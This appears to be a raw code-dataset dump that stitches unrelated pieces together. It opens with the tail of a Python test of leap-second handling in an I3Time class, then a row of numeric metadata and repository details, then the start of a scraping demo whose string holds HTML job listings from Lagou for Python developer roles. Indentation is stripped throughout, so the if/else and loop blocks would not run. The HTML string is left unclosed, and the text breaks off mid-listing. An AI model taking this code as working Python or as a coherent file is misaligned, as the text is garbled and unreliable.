assert t3.unix_time == (t3.mod_julian_day-40587)*86400
assert t3.utc_daq_time - t1.utc_daq_time == 1e10
assert t1.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10 - int(1e10)
assert t3.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10
assert t1.utc_day_of_month == 30
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Jun
assert t3.utc_month == dataclasses.I3Time.Jul
assert t1.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
#July 1 is the 181th day of the year on standard years and 182th on leap years
assert t1.utc_sec == (181+ int(year%4==0))*86400 - 1
assert t3.utc_sec == (181+ int(year%4==0))*86400
assert t1.utc_year==year
assert t3.utc_year==year
#test that it prints out the leap second correctly
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-06-30 23:59:59"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-07-01 00:00:00"%t1.utc_year
#test arithmatic
assert(t1+1*I3Units.second==t3)
assert(t3-1*I3Units.second==t1)
assert(t3-t1== 1*I3Units.second)
assert(t1-t3==-1*I3Units.second)
#do everyting again with year transition instead of June July transision
t1.set_utc_cal_date(year ,12,31,12, 0, 0,0)
t2.set_utc_cal_date(year+1, 1, 1,12, 0, 0,0)
leap_sec = t2.mod_julian_day in leap_sec_mjd
assert (t1-t2)/I3Units.second+86400 == -leap_sec
assert (t2-t1)/I3Units.second-86400 == leap_sec
if leap_sec:
assert(t1+86401*I3Units.second==t2)
assert(t2-86401*I3Units.second==t1)
else:
assert(t1+86400*I3Units.second==t2)
assert(t2-86400*I3Units.second==t1)
#re-initilize t1 and t2
t1=dataclasses.I3Time()
t2=dataclasses.I3Time()
t3=dataclasses.I3Time()
if leap_sec:
#set to leap second itsself
nanosec = random.randint(0,1e9)
t1.set_utc_cal_date(year ,12,31,23,59,59,nanosec)
t2.set_utc_cal_date(year ,12,31,23,59,60,nanosec)
t3.set_utc_cal_date(year+1, 1, 1, 0, 0, 0,nanosec)
assert not t1.is_leap_second
assert t2.is_leap_second
assert not t3.is_leap_second
# Python's date time doesn't handle leap seconds,
# so it sets the time to 23:59:59.999999
dt1=t1.date_time
dt2=t2.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt2 == datetime.datetime(year ,12,31,23,59,59,999999)
assert dt3 == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
#although the invalid python leap second object return true when compared to eachother
assert (t1+1*I3Units.second).date_time == dt2
assert (t1+2*I3Units.second).date_time == dt3
assert (t2+1*I3Units.second).date_time == dt3
assert (t2-1*I3Units.second).date_time == dt1
assert (t3-1*I3Units.second).date_time == dt2
assert (t3-2*I3Units.second).date_time == dt1
assert t1.mod_julian_day == t2.mod_julian_day
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t2.mod_julian_day_double) == t2.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1.mod_julian_day_double , t2.mod_julian_day_double, 1e-10)
assert approx_Equal(t1.mod_julian_day_double + 1/86400., t3.mod_julian_day_double, 1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t2.mod_julian_nano_sec == nanosec
assert t2.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t2.mod_julian_sec == 86400
assert t3.mod_julian_sec == 0
assert t2.unix_time + 1 == t3.unix_time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t2.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t3.unix_time == (t3.mod_julian_day-40587)*86400
sec_in_year = ( 365 + int(year%4==0) ) * 86400 + int( t1.mod_julian_day-183 in leap_sec_mjd)
assert t2.utc_daq_time - t1.utc_daq_time == 1e10
assert t3.utc_daq_time == nanosec*10
assert (t1 + 2e9).utc_daq_time == nanosec*10
assert (t2 + 1e9).utc_daq_time == nanosec*10
assert t1.utc_daq_time == ( sec_in_year -1 )*int(1e10) + nanosec*10
assert t2.utc_daq_time == ( sec_in_year )*int(1e10) + nanosec*10
assert t1.utc_day_of_month == 31
assert t2.utc_day_of_month == 31
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Dec
assert t2.utc_month == dataclasses.I3Time.Dec
assert t3.utc_month == dataclasses.I3Time.Jan
assert t1.utc_nano_sec == nanosec
assert t2.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
assert t1.utc_sec == sec_in_year - 1
assert t2.utc_sec == sec_in_year
assert t3.utc_sec == 0
assert t1.utc_year==year
assert t2.utc_year==year
assert t3.utc_year==year + 1
#test that it prints out the leap second correctly
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-12-31 23:59:59"%t1.utc_year
assert t2.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-12-31 23:59:60"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-01-01 00:00:00"%t3.utc_year
#test arithmatic
assert(t1+ I3Units.second==t2)
assert(t2+ I3Units.second==t3)
assert(t1+2*I3Units.second==t3)
assert(t3- I3Units.second==t2)
assert(t2- I3Units.second==t1)
assert(t3-2*I3Units.second==t1)
assert(t2-t1== I3Units.second)
assert(t3-t2== I3Units.second)
assert(t3-t1==2*I3Units.second)
assert(t1-t2== -I3Units.second)
assert(t2-t3== -I3Units.second)
assert(t1-t3==-2*I3Units.second)
else:
nanosec = random.randint(0,1e9)
t1.set_utc_cal_date(year ,12,31,23,59,59,nanosec)
t2.set_utc_cal_date(year ,12,31,23,59,60,nanosec)
t3.set_utc_cal_date(year+1, 1, 1, 0, 0, 0,nanosec)
assert t2==dataclasses.I3Time()
assert not t1.is_leap_second
assert not t3.is_leap_second
dt1=t1.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3 == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
#although the invalid python leap second object return true when compared to eachother
assert (t1+1*I3Units.second).date_time == dt3
assert (t3-1*I3Units.second).date_time == dt1
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day not in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1. mod_julian_day_double + 1/86400., t3.mod_julian_day_double,1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t3.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t3.mod_julian_sec == 0
#as per ntp unix time of leap seconds is the next seconds's unix time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t3.unix_time == (t3.mod_julian_day-40587)*86400
sec_in_year = ( 365 + int(year%4==0) ) * 86400 + int( t1.mod_julian_day-183 in leap_sec_mjd)
assert t3.utc_daq_time == nanosec*10
assert (t1 + 1e9).utc_daq_time == nanosec*10
assert t1.utc_daq_time == ( sec_in_year -1 )*int(1e10) + nanosec*10
assert t1.utc_day_of_month == 31
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Dec
assert t3.utc_month == dataclasses.I3Time.Jan
assert t1.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
assert t1.utc_sec == sec_in_year - 1
assert t3.utc_sec == 0
assert t1.utc_year==year
assert t3.utc_year==year + 1
#test that it prints out the leap second correctly
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-12-31 23:59:59"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-01-01 00:00:00"%t3.utc_year
#test arithmatic
assert(t1+1*I3Units.second==t3)
assert(t3-1*I3Units.second==t1)
assert(t3-t1== 1*I3Units.second)
assert(t1-t3==-1*I3Units.second)
#set the range of days to pick two years since the first and last leap second
d_start = leap_sec_mjd[ 0]-365*2
d_stop = leap_sec_mjd[-1]+365*2
a=[]
b=[]
#do a lot of trials
for i in range(10000):
#pick two random days
d1 = random.randint(d_start,d_stop)
d2 = random.randint(d_start,d_stop)
ns = random.randint(0,1e9)
#make I3Times noon of that day
t1.set_mod_julian_time(d1,43200,ns)
t2.set_mod_julian_time(d2,43200,ns)
#calculate how many leap seconds between those days
if d1> d2:
leap_seconds = sum([ x<=d1 and x>d2 for x in leap_sec_mjd])
else:
leap_seconds = -sum([ x>d1 and x<=d2 for x in leap_sec_mjd])
#check that the delta is correct
assert int((t1-t2)/I3Units.second) == (d1-d2)*86400 + leap_seconds
#check I3time + double is correct
time_delta = ((d2-d1)*86400- leap_seconds)*I3Units.second
assert(t1 + time_delta == t2)
assert(t2 - time_delta == t1)
print("Leap second test successful, (you can ignore the errors about 'Invalid second: 60!')")
| 39.348659
| 109
| 0.634177
| 3,270
| 20,540
| 3.802446
| 0.086239
| 0.065868
| 0.066592
| 0.033778
| 0.821216
| 0.814541
| 0.802155
| 0.800627
| 0.787196
| 0.773283
| 0
| 0.107959
| 0.250049
| 20,540
| 521
| 110
| 39.424184
| 0.699234
| 0.135589
| 0
| 0.803077
| 0
| 0
| 0.03476
| 0
| 0
| 0
| 0
| 0
| 0.732308
| 1
| 0.003077
| false
| 0
| 0.009231
| 0.003077
| 0.015385
| 0.003077
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
86e434ce86d2a788348dd975202cf547479816c8
| 47,418
|
py
|
Python
|
nz_crawl_demo/day3/demo1.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | null | null | null |
nz_crawl_demo/day3/demo1.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | 27
|
2020-02-12T07:55:58.000Z
|
2022-03-12T00:19:09.000Z
|
nz_crawl_demo/day3/demo1.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | 2
|
2020-02-18T01:54:55.000Z
|
2020-02-21T11:36:28.000Z
|
from lxml import etree
text = """
<ul class="item_con_list" style="display: block;">
<li class="con_list_item first_row default_list" data-index="0" data-positionid="3580958" data-salary="18k-25k" data-company="众禄金融" data-positionname="python工程师" data-companyid="50285" data-hrid="1509336" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3580958.html" target="_blank" data-index="0" data-lg-tj-id="8E00" data-lg-tj-no="
0101
" data-lg-tj-cid="3580958" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python工程师</h3>
<span class="add">[<em>罗湖区</em>]</span>
</a>
<span class="format-time">3天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="石经理">
<input type="hidden" class="hr_position" value="招聘经理">
<input type="hidden" class="target_hr" value="1509336">
<input type="hidden" class="target_position" value="3580958">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0101" data-lg-tj-cid="50285" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">18k-25k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/50285.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0101
" data-lg-tj-cid="50285" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">众禄金融</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,金融 / 上市公司
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/50285.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0101
" data-lg-tj-cid="50285" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/18/65/CgotOVn65YSAAu7lAAAVwDCKc5w606.png" alt="众禄金融" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>金融</span>
<span>信息安全</span>
<span>php</span>
<span>Java</span>
<span>web</span>
</div>
<div class="li_b_r">“互联网金融,高速发展,五险一金,金融中心”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="1" data-positionid="3172437" data-salary="10k-15k" data-company="乐易网络" data-positionname="python开发工程师" data-companyid="33627" data-hrid="569371" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3172437.html" target="_blank" data-index="1" data-lg-tj-id="8E00" data-lg-tj-no="
0102
" data-lg-tj-cid="3172437" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python开发工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image/M00/4C/88/CgpFT1lwWhiAB5C2AAD55Ttkxck626.jpg">
<input type="hidden" class="hr_name" value="Tina">
<input type="hidden" class="hr_position" value="HR">
<input type="hidden" class="target_hr" value="569371">
<input type="hidden" class="target_position" value="3172437">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0102" data-lg-tj-cid="33627" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1">
<div class="chat_pop_up">
<span class="arrow"></span>
<dl class="chat_main clearfix">
<dt><div class="chat_qrcode"><canvas width="116" height="116"></canvas></div></dt>
<dd>
<dl class="chat_head clearfix">
<dt>
<img class="hr_headpic" src="https://static.lagou.com/i/image/M00/4C/88/CgpFT1lwWhiAB5C2AAD55Ttkxck626.jpg" alt="hr头像" width="62" height="62">
</dt>
<dd>
<div class="hr_name">Tina</div>
<div class="hr_position">HR</div>
</dd>
<dd class="tips_text">Hi,对我发布的职位感兴趣?用拉勾APP扫码,直接和我聊聊吧!</dd>
</dl>
</dd>
</dl>
</div>
</div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">10k-15k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/33627.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0102
" data-lg-tj-cid="33627" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">乐易网络</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,游戏 / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/33627.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0102
" data-lg-tj-cid="33627" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/57/05/CgqKkVfOIv6AQwyPAAEg94dso0Q147.png" alt="乐易网络" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>php</span>
<span>MySQL</span>
<span>后端</span>
</div>
<div class="li_b_r">“五险一金,年终奖金”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="2" data-positionid="3088129" data-salary="10k-20k" data-company="对酒当歌" data-positionname="python开发工程师" data-companyid="32901" data-hrid="557623" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3088129.html" target="_blank" data-index="2" data-lg-tj-id="8E00" data-lg-tj-no="
0103
" data-lg-tj-cid="3088129" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python开发工程师</h3>
<span class="add">[<em>宝安区</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/1D/93/CgoB5loJToSAXS5UAAAxRCAgR0I656.jpg">
<input type="hidden" class="hr_name" value="Fiona">
<input type="hidden" class="hr_position" value="HR">
<input type="hidden" class="target_hr" value="557623">
<input type="hidden" class="target_position" value="3088129">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0103" data-lg-tj-cid="32901" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">10k-20k</span>
<!--<i></i>-->经验1-3年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/32901.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0103
" data-lg-tj-cid="32901" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">对酒当歌</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
电子商务,O2O / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/32901.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0103
" data-lg-tj-cid="32901" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/1D/93/CgoB5loJTs6AbgL2AAAxM5rVkG8611.jpg" alt="对酒当歌" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>php</span>
<span>Java</span>
<span>MySQL</span>
</div>
<div class="li_b_r">“五险一金,免费班车”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="3" data-positionid="3163697" data-salary="15k-30k" data-company="笨鸟社交" data-positionname="python工程师" data-companyid="84086" data-hrid="3628930" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3163697.html" target="_blank" data-index="3" data-lg-tj-id="8E00" data-lg-tj-no="
0104
" data-lg-tj-cid="3163697" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">1天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/21/C0/CgotOVoTm-KAL5xbAAEYJ1YAVhc922.jpg">
<input type="hidden" class="hr_name" value="马小姐">
<input type="hidden" class="hr_position" value="">
<input type="hidden" class="target_hr" value="3628930">
<input type="hidden" class="target_position" value="3163697">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0104" data-lg-tj-cid="84086" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验不限 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/84086.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0104
" data-lg-tj-cid="84086" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">笨鸟社交</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
企业服务 / B轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/84086.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0104
" data-lg-tj-cid="84086" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/10/1C/CgpFT1jwK86AVr_OAACaAuJFFLw446.png" alt="笨鸟社交" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>爬虫</span>
<span>后端</span>
<span>初级</span>
<span>中级</span>
<span>搜索</span>
</div>
<div class="li_b_r">“海量数据”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="4" data-positionid="3867111" data-salary="15k-28k" data-company="博奥特科技" data-positionname="Python工程师" data-companyid="69152" data-hrid="9207315" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3867111.html" target="_blank" data-index="4" data-lg-tj-id="8E00" data-lg-tj-no="
0105
" data-lg-tj-cid="3867111" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python工程师</h3>
<span class="add">[<em>上步</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/1C/84/CgoB5loFXcaAMM23AABudjCbyWs865.png">
<input type="hidden" class="hr_name" value="qiuff">
<input type="hidden" class="hr_position" value="招聘部">
<input type="hidden" class="target_hr" value="9207315">
<input type="hidden" class="target_position" value="3867111">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0105" data-lg-tj-cid="69152" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-28k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/69152.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0105
" data-lg-tj-cid="69152" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">博奥特科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,金融 / 未融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/69152.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0105
" data-lg-tj-cid="69152" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/18/B4/CgoB5ln71t2ADbc3AABFDELpI7U021.jpg" alt="博奥特科技" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>金融</span>
<span>Java</span>
<span>cobol</span>
</div>
<div class="li_b_r">“发展前景好,双休,互联网金融”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="5" data-positionid="2889252" data-salary="15k-30k" data-company="万科物业" data-positionname="Python开发工程师" data-companyid="8350" data-hrid="7279982" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2889252.html" target="_blank" data-index="5" data-lg-tj-id="8E00" data-lg-tj-no="
0106
" data-lg-tj-cid="2889252" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发工程师</h3>
<span class="add">[<em>上梅林</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="xiongx04">
<input type="hidden" class="hr_position" value="">
<input type="hidden" class="target_hr" value="7279982">
<input type="hidden" class="target_position" value="2889252">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0106" data-lg-tj-cid="8350" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/8350.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0106
" data-lg-tj-cid="8350" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">万科物业</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
O2O,生活服务 / 不需要融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/8350.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0106
" data-lg-tj-cid="8350" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image2/M00/08/03/CgqLKVYBEtqAD2vhAAARnNY0kzg058.png" alt="万科物业" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>资深</span>
<span>高级</span>
<span>中级</span>
<span>后端开发</span>
<span>redis</span>
</div>
<div class="li_b_r">“平台好,空间大”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="6" data-positionid="2786718" data-salary="10k-15k" data-company="环球易购" data-positionname="高级python开发工程师" data-companyid="83025" data-hrid="2117758" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2786718.html" target="_blank" data-index="6" data-lg-tj-id="8E00" data-lg-tj-no="
0107
" data-lg-tj-cid="2786718" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">高级python开发工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">1天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/1E/F1/CgoB5loL-aGASIqDAAATxYblCtQ334.jpg">
<input type="hidden" class="hr_name" value="Hipson">
<input type="hidden" class="hr_position" value="首席神秘官">
<input type="hidden" class="target_hr" value="2117758">
<input type="hidden" class="target_position" value="2786718">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0107" data-lg-tj-cid="83025" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">10k-15k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/83025.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0107
" data-lg-tj-cid="83025" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">环球易购</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
电子商务 / 上市公司
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/83025.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0107
" data-lg-tj-cid="83025" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/38/9F/CgYXBlWmIt6Af8k5AABvK21LZWM490.jpg?cc=0.211507520172745" alt="环球易购" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>软件开发</span>
</div>
<div class="li_b_r">“上市公司 公司规模大 发展机会多”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="7" data-positionid="3325916" data-salary="15k-23k" data-company="晶泰科技" data-positionname="高级Python开发工程师" data-companyid="76066" data-hrid="5281055" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3325916.html" target="_blank" data-index="7" data-lg-tj-id="8E00" data-lg-tj-no="
0108
" data-lg-tj-cid="3325916" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">高级Python开发工程师</h3>
<span class="add">[<em>香蜜湖</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image/M00/48/46/CgpFT1loITKAe1YZAAD7YMAGvnI602.jpg">
<input type="hidden" class="hr_name" value="李丹慧">
<input type="hidden" class="hr_position" value="HR经理">
<input type="hidden" class="target_hr" value="5281055">
<input type="hidden" class="target_position" value="3325916">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0108" data-lg-tj-cid="76066" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-23k</span>
<!--<i></i>-->经验1-3年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/76066.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0108
" data-lg-tj-cid="76066" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">晶泰科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
企业服务,医疗健康 / B轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/76066.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0108
" data-lg-tj-cid="76066" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/46/CE/CgqKkVeNuE-AMgmGAACJzPxVN30374.jpg" alt="晶泰科技" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>云计算</span>
<span>后端开发</span>
<span>web</span>
<span>Go</span>
<span>django</span>
</div>
<div class="li_b_r">“大牛多,公司氛围好,周末双休,成长快”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="8" data-positionid="3727987" data-salary="14k-20k" data-company="盖威" data-positionname="Python开发工程师" data-companyid="3956" data-hrid="5713991" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
